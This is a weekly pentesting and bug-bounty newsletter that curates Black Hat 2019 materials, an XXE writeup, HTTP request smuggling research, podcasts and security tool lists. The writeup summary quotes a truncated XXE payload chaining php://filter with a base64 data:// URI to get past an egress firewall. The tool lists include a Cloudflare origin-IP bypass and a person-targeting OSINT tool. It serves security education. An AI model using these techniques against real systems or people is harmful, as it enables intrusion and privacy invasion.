The 5 Hacking NewsLetter 66

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 02 to 09 of August.

T5HN66.png

Our favorite 5 hacking items

A. Slides of the week

Black Hat USA 2019 Slides & presentation materials

It feels like Hacker Summer Camp (Black Hat, Defcon, BSides Las Vegas…) has dominated the news this week. A huge chunk of new vulnerabilities, tools, slides, and whitepapers published were shared during these events.

So I am not going to share with you all the links because there are way too many. But you can find slides and whitepapers on the Black Hat website. You can start going through that while waiting for the video recordings to come out.

Also here is what I do to find materials on a topic I’m interested in: I check out the talk’s title and author in the presentations schedule or in the workshops page. Then I search for it on Twitter/Google/Github.

For example, I found these using this method:

Also, don’t forget to check out the arsenal section. You won’t necessarily see links to the tools there, but you can find them on Github/Google (e.g. Eyeballer & JSShell).

2. Writeup of the week

Exploiting Out Of Band XXE using internal network and php wrappers

A few days ago, @Zombiehelp54 tweeted about having exploited an XXE despite a firewall blocking all outgoing requests including DNS lookups. That was suspenseful! Here is how he did it:

  • The app had an “xml” parameter that was encrypted
  • The encryption function was readable in JavaScript, but it was hard to read. So he used breakpoints to modify the XML data just before encryption. This allowed him to inject his own encrypted payloads
  • It was possible to inject external entities. The XXE was proved but a firewall blocked all outgoing requests. Only requests to the internal network were allowed and Mahmoud couldn’t fetch external DTD files from his server
  • Using data:// didn’t work. But the firewall could be bypassed by using php:// to fetch a resource from a data:// URI
  • Of course, this work because the app is in PHP!
  • The payload was: php://filter//resource=data://text/plain;base64,PCFFTlRJVFkgJSBkYXRhIFNZU1R...

Note that this is just a summary. Check out the writeup, it’s full of awesome advanced XXE exploitation techniques.

3. Article / Tool of the week

HTTP Desync Attacks: Request Smuggling Reborn

To be honest, I haven’t had the time to properly read this article. But judging from @albinowax’s previous research, I know for sure that it’s good. He earned over $70k bug bounties while doing this research!

The attack is based on a forgotten technique called “HTTP request smuggling”. It can lead to bypassing security controls or accessing unauthorized sensitive data, and can be chained with Web cache poisoning and XSS.

The awesome part is that, since James works at PortSwigger, a Burp extension to scan for Request Smuggling bugs is already available. A new scan check was also added to the Burp scanner. And a new lesson was added to the Web Security Academy (with 12 labs).

Also, he only tested approx 5% of bug bounty sites, so there’s still room for us mortals to play with this bug.

4. Podcast of the week

🔴 404 Podcast Not Found #4 /w PwnFunction

This is a cool podcast episode if you’re looking for something to pass the time while commuting, walking or exercising.

It’s not technical at all, it’s more in the entertainment category. But it’s nice getting to know the mysterious @PwnFunction. Also I love the trivia quizz, wish it was longer!

5. Videos of the week

GitHub Recon and Sensitive Data Exposure, Advanced Burp Suite, Recon & Discovery, XML External Entity Injection & Server Side Forgery Request

Wow, that’s a lot to watch! My hacker watchlist keeps alarmingly growing these days.

Bugcrowd University just dropped 5 new videos on recon, Github, Burp, XXE and SSRF. They look really interesting. And judging from their length, there is probably something new to learn here for everyone.

Other amazing things we stumbled upon this week

Videos

Podcasts

Conferences

Slides & Material

Tutorials

Medium to advanced

Beginners corner

Writeups

Challenge writeups

Pentest writeups

Responsible(ish) disclosure writeups

Bug bounty writeups

See more writeups on The list of bug bounty writeups.

Tools

If you don’t have time

  • Cloudflare-origin-ip.py: A script to perform automatic Cloudflare bypass test through Censys
  • XFFenum: X-Forwarded-For [403 forbidden] enumeration
  • Timeinator: Burp extension that can be used to perform timing attacks over an unreliable network such as the internet

More tools, if you have time

  • Confluence_searcher.py: Python3 script to help search Confluence for different key words & output the results to a csv. Change the URL api path based on your installation
  • Orca: Targeted OSINT Framework
  • Irule-detector: Burp extension that detects F5 BigIP vulnerable to an RCE affecting the iRule feature
  • SMTPTester: Small python3 tool to check common vulnerabilities in SMTP servers
  • AttackSurfaceMapper: A tool that aims to automate the reconnaissance process
  • PyDNSRecon / Runbooks: Subdomain enumeration tool that uses Censys.io, Amass & Sonar FDNS data
  • Marzavec/run.js: Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
  • LittleBrother: Information gathering (OSINT) on a person (EU). No API key or login needed

Misc. pentest & bug bounty resources

Challenges

Articles

News

Bug bounty & Pentest news

Reports

Vulnerabilities

Breaches & Attacks

Other news

Non technical

Tweeted this week

We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 08/02/2019 to 08/09/2019


Curated by Pentester Land & Sponsored by Intigriti

Have a nice week folks!

If you want to be notified when new articles (including this newsletter) are published, you can subscribe to this blog.

And if you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…


Comments